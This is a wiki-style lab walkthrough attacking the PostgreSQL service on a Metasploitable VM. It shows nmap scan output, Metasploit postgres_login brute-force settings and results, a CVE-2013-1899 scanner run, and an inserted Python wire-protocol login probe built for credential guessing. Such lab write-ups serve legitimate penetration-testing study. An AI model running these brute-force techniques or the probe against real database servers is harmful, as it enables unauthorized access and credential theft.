From charlesreid1


Revision as of 09:52, 25 March 2016

This page covers activities on the Metasploitable virtualbox related to the postgresql service that is running.


Recon

Reminder, the remote machine (Metasploitable) is available at 10.0.0.27.

$ nmap -sS -sV -A 10.0.0.27

Starting Nmap 7.01 ( https://nmap.org ) at 2016-03-22 18:30 PDT
Nmap scan report for 10.0.0.27
Host is up (0.016s latency).
Not shown: 977 closed ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
23/tcp   open  telnet      Linux telnetd
25/tcp   open  smtp        Postfix smtpd
|_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, 
| ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2010-03-17T14:07:45
|_Not valid after:  2010-04-16T14:07:45
|_ssl-date: 2016-03-23T01:31:31+00:00; +33s from scanner time.
53/tcp   open  domain      ISC BIND 9.4.2
| dns-nsid: 
|_  bind.version: 9.4.2
80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
|_http-server-header: Apache/2.2.8 (Ubuntu) DAV/2
|_http-title: Metasploitable2 - Linux
111/tcp  open  rpcbind     2 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100003  2,3,4       2049/tcp  nfs
|   100003  2,3,4       2049/udp  nfs
|   100005  1,2,3      42810/tcp  mountd
|   100005  1,2,3      45599/udp  mountd
|   100021  1,3,4      34385/tcp  nlockmgr
|   100021  1,3,4      60702/udp  nlockmgr
|   100024  1          38085/udp  status
|_  100024  1          52004/tcp  status
139/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
512/tcp  open  exec        netkit-rsh rexecd
513/tcp  open  login?
514/tcp  open  tcpwrapped
1099/tcp open  java-rmi    Java RMI Registry
1524/tcp open  shell       Metasploitable root shell
2049/tcp open  nfs         2-4 (RPC #100003)
2121/tcp open  ftp         ProFTPD 1.3.1
3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5
| mysql-info: 
|   Protocol: 53
|   Version: .0.51a-3ubuntu5
|   Thread ID: 8
|   Capabilities flags: 43564
|   Some Capabilities: Support41Auth, SupportsTransactions, Speaks41ProtocolNew, SwitchToSSLAfterHandshake, ConnectWithDatabase, LongColumnFlag, SupportsCompression
|   Status: Autocommit
|_  Salt: w$K,8vk7k8tagd@PR*zK
5432/tcp open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open  vnc         VNC (protocol 3.3)
| vnc-info: 
|   Protocol version: 3.3
|   Security types: 
|_    Unknown security type (33554432)
6000/tcp open  X11         (access denied)
6667/tcp open  irc         Unreal ircd
| irc-info: 
|   users: 1
|   servers: 1
|   lusers: 1
|   lservers: 0
|   server: irc.Metasploitable.LAN
|   version: Unreal3.2.8.1. irc.Metasploitable.LAN 
|   uptime: 0 days, 1:05:20
|   source ident: nmap
|   source host: 6D4CD63B.D3975B40.7B559A54.IP
|_  error: Closing Link: cxfhgnbdt[10.0.0.25] (Quit: cxfhgnbdt)
8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request
8180/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/5.5
MAC Address: 08:00:27:47:98:AD (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: Hosts:  metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.20-Debian)
|   NetBIOS computer name: 
|   Workgroup: WORKGROUP
|_  System time: 2016-03-22T21:31:31-04:00

TRACEROUTE
HOP RTT      ADDRESS
1   16.11 ms 10.0.0.27

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.31 seconds

Search Metasploit for Exploits

msf auxiliary(postgres_version) > search postgresql

Matching Modules
================

   Name                                                       Disclosure Date  Rank       Description
   ----                                                       ---------------  ----       -----------
   auxiliary/admin/http/manageengine_pmp_privesc              2014-11-08       normal     ManageEngine Password Manager SQLAdvancedALSearchResult.cc Pro SQL Injection
   auxiliary/admin/http/rails_devise_pass_reset               2013-01-28       normal     Ruby on Rails Devise Authentication Password Reset
   auxiliary/admin/postgres/postgres_readfile                                  normal     PostgreSQL Server Generic Query
   auxiliary/admin/postgres/postgres_sql                                       normal     PostgreSQL Server Generic Query
   auxiliary/scanner/postgres/postgres_dbname_flag_injection                   normal     PostgreSQL Database Name Command Line Flag Injection
   auxiliary/scanner/postgres/postgres_login                                   normal     PostgreSQL Login Utility
   auxiliary/scanner/postgres/postgres_version                                 normal     PostgreSQL Version Probe
   auxiliary/server/capture/postgresql                                         normal     Authentication Capture: PostgreSQL
   exploit/linux/postgres/postgres_payload                    2007-06-05       excellent  PostgreSQL for Linux Payload Execution
   exploit/multi/http/manage_engine_dc_pmp_sqli               2014-06-08       excellent  ManageEngine Desktop Central / Password Manager LinkViewFetchServlet.dat SQL Injection
   exploit/windows/postgres/postgres_payload                  2009-04-10       excellent  PostgreSQL for Microsoft Windows Payload Execution
   post/linux/gather/enum_users_history                                        normal     Linux Gather User History

Scanner

One of the first pieces of information you will need, even before running a brute-force attack on a PostgreSQL login, is a database name. Unlike MySQL, the PostgreSQL startup message carries the name of the database the client wants, and a wrong name fails the login even when the credentials are right. You do not have to guess one: every cluster has template1 (and, from 8.1 onward, postgres), which is why the login module defaults to template1.

Postgres login

The postgresql login attack is at

msf > use auxiliary/scanner/postgres/postgres_login

Info

Information/description of the postgres login attack is given below:

Description:
  This module attempts to authenticate against a PostgreSQL instance 
  using username and password combinations indicated by the USER_FILE, 
  PASS_FILE, and USERPASS_FILE options. Note that passwords may be 
  either plaintext or MD5 formatted hashes.

The various options for the postgres login attack are given below:

Basic options:
  Name              Current Setting                                                               Required  Description
  ----              ---------------                                                               --------  -----------
  BLANK_PASSWORDS   false                                                                         no        Try blank passwords for all users
  BRUTEFORCE_SPEED  5                                                                             yes       How fast to bruteforce, from 0 to 5
  DATABASE          template1                                                                     yes       The database to authenticate against
  DB_ALL_CREDS      false                                                                         no        Try each user/password couple stored in the current database
  DB_ALL_PASS       false                                                                         no        Add all passwords in the current database to the list
  DB_ALL_USERS      false                                                                         no        Add all users in the current database to the list
  PASSWORD                                                                                        no        A specific password to authenticate with
  PASS_FILE         /usr/share/metasploit-framework/data/wordlists/postgres_default_pass.txt      no        File containing passwords, one per line
  Proxies                                                                                         no        A proxy chain of format type:host:port[,type:host:port][...]
  RETURN_ROWSET     true                                                                          no        Set to true to see query result sets
  RHOSTS                                                                                          yes       The target address range or CIDR identifier
  RPORT             5432                                                                          yes       The target port
  STOP_ON_SUCCESS   false                                                                         yes       Stop guessing when a credential works for a host
  THREADS           1                                                                             yes       The number of concurrent threads
  USERNAME          postgres                                                                      no        A specific username to authenticate as
  USERPASS_FILE     /usr/share/metasploit-framework/data/wordlists/postgres_default_userpass.txt  no        File containing (space-seperated) users and passwords, one pair per line
  USER_AS_PASS      false                                                                         no        Try the username as the password for all users
  USER_FILE         /usr/share/metasploit-framework/data/wordlists/postgres_default_user.txt      no        File containing users, one per line
  VERBOSE           true                                                                          yes       Whether to print output for all attempts

Set Variables

To do this attack, we will want to set the following variables:

  • try blank passwords
  • set bruteforce speed to 5
  • database - leave the default template1, which exists on every PostgreSQL cluster (the run below uses "postgresql" instead, and that choice is what produces the C3D000 result)
  • password file (see Kali/Wordlists)
  • remote hosts 10.0.0.27 (metasploitable machine)
  • stop on success (note that the options listing below still shows it as false)
  • username file (contains root, guest, postgres)
  • verbose

Things I was not sure about at first:

  • how you know what database names are: you do not need to, because template1 and postgres are created by initdb on every cluster and either one will do for authentication

After setting and unsetting a few variable values, we're ready to rock:

msf auxiliary(postgres_login) > show options

Module options (auxiliary/scanner/postgres/postgres_login):

   Name              Current Setting                                                               Required  Description
   ----              ---------------                                                               --------  -----------
   BLANK_PASSWORDS   true                                                                          no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                                                                             yes       How fast to bruteforce, from 0 to 5
   DATABASE          postgresql                                                                    yes       The database to authenticate against
   DB_ALL_CREDS      false                                                                         no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false                                                                         no        Add all passwords in the current database to the list
   DB_ALL_USERS      false                                                                         no        Add all users in the current database to the list
   PASSWORD                                                                                        no        A specific password to authenticate with
   PASS_FILE         /usr/share/metasploit-framework/data/wordlists/postgres_default_pass.txt      no        File containing passwords, one per line
   Proxies                                                                                         no        A proxy chain of format type:host:port[,type:host:port][...]
   RETURN_ROWSET     true                                                                          no        Set to true to see query result sets
   RHOSTS            10.0.0.27                                                                     yes       The target address range or CIDR identifier
   RPORT             5432                                                                          yes       The target port
   STOP_ON_SUCCESS   false                                                                         yes       Stop guessing when a credential works for a host
   THREADS           1                                                                             yes       The number of concurrent threads
   USERNAME          root                                                                          no        A specific username to authenticate as
   USERPASS_FILE     /usr/share/metasploit-framework/data/wordlists/postgres_default_userpass.txt  no        File containing (space-seperated) users and passwords, one pair per line
   USER_AS_PASS      false                                                                         no        Try the username as the password for all users
   USER_FILE         /usr/share/metasploit-framework/data/wordlists/postgres_default_user.txt      no        File containing users, one per line
   VERBOSE           true                                                                          yes       Whether to print output for all attempts

First Results

First results from running the scanner module show one attempt where the username and password were correct but the database name was not. The role postgres with password postgres authenticated, but there is no database named postgresql (the value set for DATABASE above), so the backend rejected the session after authentication:

msf auxiliary(postgres_login) > run

[-] 10.0.0.27:5432 POSTGRES - LOGIN FAILED: root:@postgresql (Incorrect: Invalid username or password)
[-] 10.0.0.27:5432 POSTGRES - LOGIN FAILED: postgres:postgres@postgresql (Incorrect: C3D000, Creds were good but database was bad)
[-] 10.0.0.27:5432 POSTGRES - LOGIN FAILED: postgres:password@postgresql (Incorrect: Invalid username or password)
[-] 10.0.0.27:5432 POSTGRES - LOGIN FAILED: postgres:admin@postgresql (Incorrect: Invalid username or password)
[-] 10.0.0.27:5432 POSTGRES - LOGIN FAILED: admin:admin@postgresql (Incorrect: Invalid username or password)
[-] 10.0.0.27:5432 POSTGRES - LOGIN FAILED: admin:password@postgresql (Incorrect: Invalid username or password)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

The line to watch is the one reporting C3D000. That is SQLSTATE 3D000 (invalid_catalog_name), which the backend only returns after authentication has succeeded, so it tells you the username and password are correct and only the database name is wrong. Metasploit still counts it as a failed login, which means STOP_ON_SUCCESS never fires and, in a long run against a big wordlist, the one good pair is buried among thousands of genuine failures unless you are capturing the console output. That is also wasted time. The fix is simple: leave DATABASE at its default of template1, which exists on every PostgreSQL cluster, and the same pair is reported as a successful login.
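To make the C3D000 result concrete, here is a minimal PostgreSQL v3 wire-protocol login probe that does what postgres_login does under the hood. This is an added example, not code from the original page or from Metasploit. It builds the StartupMessage (which carries the database name), answers a cleartext or MD5 password request, and classifies the backend's ErrorResponse by SQLSTATE, so a "creds good, database bad" outcome is never mistaken for a plain authentication failure. The host, port, credentials and the two sample server payloads are constructed for the example.

```python
"""PostgreSQL v3 wire-protocol login probe (added example, not Metasploit's code).

The StartupMessage carries the database name; the backend authenticates first
and only then looks the database up, so a correct user/password against a
non-existent database fails late with SQLSTATE 3D000.  Metasploit's "C3D000"
string is the ErrorResponse field code 'C' followed by that SQLSTATE.
"""
import hashlib
import socket
import struct

PROTOCOL_V3 = 196608  # major version 3, minor 0

# Constructed ErrorResponse payloads (what follows the 'E' type byte and the
# int32 length).  Fields are (1-byte code, cstring) pairs terminated by \0.
SAMPLE_DB_MISSING_ERROR = b'SFATAL\x00C3D000\x00Mdatabase "postgresql" does not exist\x00\x00'
SAMPLE_AUTH_FAILED_ERROR = b'SFATAL\x00C28000\x00Mpassword authentication failed for user "postgres"\x00\x00'


def build_startup_message(user, database):
    """StartupMessage: int32 length (self-inclusive), int32 protocol, key\\0value\\0 pairs, \\0."""
    params = (b"user\x00" + user.encode() + b"\x00"
              + b"database\x00" + database.encode() + b"\x00\x00")
    body = struct.pack("!I", PROTOCOL_V3) + params
    return struct.pack("!I", len(body) + 4) + body


def md5_password(user, password, salt):
    """PostgreSQL MD5 auth: "md5" + hex(md5(hex(md5(password + user)) + 4-byte salt))."""
    inner = hashlib.md5(password.encode() + user.encode()).hexdigest()
    return "md5" + hashlib.md5(inner.encode() + salt).hexdigest()


def build_password_message(secret):
    """PasswordMessage: 'p', int32 length (self-inclusive), cstring."""
    body = secret.encode() + b"\x00"
    return b"p" + struct.pack("!I", len(body) + 4) + body


def parse_error_fields(payload):
    """ErrorResponse body -> {field code: value}.  'C' is the SQLSTATE, 'M' the message."""
    fields = {}
    i = 0
    while i < len(payload) and payload[i] != 0:
        end = payload.index(b"\x00", i + 1)
        fields[chr(payload[i])] = payload[i + 1:end].decode("utf-8", "replace")
        i = end + 1
    return fields


def classify_error(fields):
    """Reduce a SQLSTATE to the outcome a brute-forcer must not confuse."""
    sqlstate = fields.get("C", "")
    if sqlstate == "3D000":             # invalid_catalog_name: auth passed, database missing
        return "creds_ok_db_missing"
    if sqlstate in ("28000", "28P01"):  # invalid_authorization_specification / invalid_password
        return "auth_failed"
    return "other:" + sqlstate


def recv_exact(sock, n):
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("server closed the connection")
        buf += chunk
    return buf


def read_message(sock):
    """One backend message: 1-byte type, int32 length (self-inclusive), payload."""
    header = recv_exact(sock, 5)
    (length,) = struct.unpack("!I", header[1:5])
    return chr(header[0]), recv_exact(sock, length - 4)


def probe_login(host, port, user, password, database, timeout=5.0):
    """Try one user/password/database triple and return its outcome class."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_startup_message(user, database))
        while True:
            msg_type, payload = read_message(sock)
            if msg_type == "E":                      # ErrorResponse
                return classify_error(parse_error_fields(payload))
            if msg_type == "R":                      # AuthenticationRequest
                (auth_type,) = struct.unpack("!I", payload[:4])
                if auth_type == 3:                   # cleartext password
                    sock.sendall(build_password_message(password))
                elif auth_type == 5:                 # MD5 with 4-byte salt
                    sock.sendall(build_password_message(md5_password(user, password, payload[4:8])))
                elif auth_type != 0:                 # 0 = AuthenticationOk; keep reading
                    return "unsupported_auth:%d" % auth_type
            elif msg_type == "Z":                    # ReadyForQuery: fully logged in
                return "login_ok"
            # 'S' ParameterStatus, 'K' BackendKeyData, 'N' NoticeResponse: ignore


if __name__ == "__main__":
    # Offline demonstration on the constructed payloads.  Against a lab box this
    # would be probe_login("10.0.0.27", 5432, "postgres", "postgres", "template1").
    for sample in (SAMPLE_DB_MISSING_ERROR, SAMPLE_AUTH_FAILED_ERROR):
        print(classify_error(parse_error_fields(sample)))
```

Two things worth noticing. First, the "creds_ok_db_missing" outcome is a positive finding for a brute-forcer and should stop the run, which is exactly what the Metasploit output above does not do. Second, the database field in the StartupMessage is the same unvalidated string that the next section's CVE-2013-1899 scanner abuses: on 9.0 to 9.2 servers a name beginning with a dash was treated as a command-line switch for the backend.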

Postgres dbname flag injection

Despite the name, this is a scanner module, not an exploit: it only checks whether a PostgreSQL 9.0, 9.1 or 9.2 server is vulnerable to CVE-2013-1899, in which a database name beginning with a dash was passed to the backend as a command-line switch. The bug itself can lead to denial of service, privilege escalation or even arbitrary code execution (see the module description below), but the scanner gives you no foothold by itself, and it will not fire against this Metasploitable VirtualBox, whose PostgreSQL 8.3 predates the affected releases.

Use the postgres_dbname_flag_injection exploit:

msf > use auxiliary/scanner/postgres/postgres_dbname_flag_injection 

Information about the Module

These two commands show basic and advanced information about the module (once the module is loaded, the path argument is optional):

msf auxiliary(postgres_dbname_flag_injection) > info auxiliary/scanner/postgres/postgres_dbname_flag_injection 
msf auxiliary(postgres_dbname_flag_injection) > advanced auxiliary/scanner/postgres/postgres_dbname_flag_injection 

Here is the output of basic information:

msf auxiliary(postgres_dbname_flag_injection) > info auxiliary/scanner/postgres/postgres_dbname_flag_injection 


       Name: PostgreSQL Database Name Command Line Flag Injection
     Module: auxiliary/scanner/postgres/postgres_dbname_flag_injection
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  hdm <x@hdm.io>

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  RHOSTS                    yes       The target address range or CIDR identifier
  RPORT    5432             yes       The target port
  THREADS  1                yes       The number of concurrent threads

Description:
  This module can identify PostgreSQL 9.0, 9.1, and 9.2 servers that 
  are vulnerable to command-line flag injection through CVE-2013-1899. 
  This can lead to denial of service, privilege escalation, or even 
  arbitrary code execution.

References:
  http://cvedetails.com/cve/2013-1899/
  http://www.postgresql.org/support/security/faq/2013-04-04/

We can show the basic options:

msf auxiliary(postgres_dbname_flag_injection) > show options

Module options (auxiliary/scanner/postgres/postgres_dbname_flag_injection):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target address range or CIDR identifier
   RPORT    5432             yes       The target port
   THREADS  1                yes       The number of concurrent threads

msf auxiliary(postgres_dbname_flag_injection) > set RHOSTS 10.0.0.27
RHOSTS => 10.0.0.27
msf auxiliary(postgres_dbname_flag_injection) > set RPORT 5432
RPORT => 5432

Now we can show the advanced options:


msf auxiliary(postgres_dbname_flag_injection) > advanced

Module advanced options (auxiliary/scanner/postgres/postgres_dbname_flag_injection):

   Name           : CHOST
   Current Setting: 
   Description    : The local client address

   Name           : CPORT
   Current Setting: 
   Description    : The local client port

   Name           : ConnectTimeout
   Current Setting: 10
   Description    : Maximum number of seconds to establish a TCP connection

   Name           : Proxies
   Current Setting: 
   Description    : A proxy chain of format type:host:port[,type:host:port][...]

   Name           : SSL
   Current Setting: false
   Description    : Negotiate SSL for outgoing connections

   Name           : SSLCipher
   Current Setting: 
   Description    : String for SSL cipher - "DHE-RSA-AES256-SHA" or "ADH"

   Name           : SSLVerifyMode
   Current Setting: PEER
   Description    : SSL verification method (Accepted: CLIENT_ONCE, 
      FAIL_IF_NO_PEER_CERT, NONE, PEER)

   Name           : SSLVersion
   Current Setting: TLS1
   Description    : Specify the version of SSL/TLS to be used (TLS and SSL23 are 
      auto-negotiate) (Accepted: SSL2, SSL3, SSL23, TLS, TLS1, TLS1.1, 
      TLS1.2)

   Name           : ShowProgress
   Current Setting: true
   Description    : Display progress messages during a scan

   Name           : ShowProgressPercent
   Current Setting: 10
   Description    : The interval in percent that progress should be shown

   Name           : VERBOSE
   Current Setting: false
   Description    : Enable detailed status messages

   Name           : WORKSPACE
   Current Setting: 
   Description    : Specify the workspace for this module

When an Exploit Doesn't Work

This version of PostgreSQL (8.3, per the nmap banner and the version probe) is too old to be vulnerable to CVE-2013-1899, which affects only the 9.0, 9.1 and 9.2 branches, so the scanner reports the host as not vulnerable. Checking the banner first saves a pointless run:

msf auxiliary(postgres_dbname_flag_injection) > set RHOSTS 10.0.0.27
RHOSTS => 10.0.0.27
msf auxiliary(postgres_dbname_flag_injection) > run

[*] 10.0.0.27:5432 does not appear to be vulnerable to CVE-2013-1899
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Related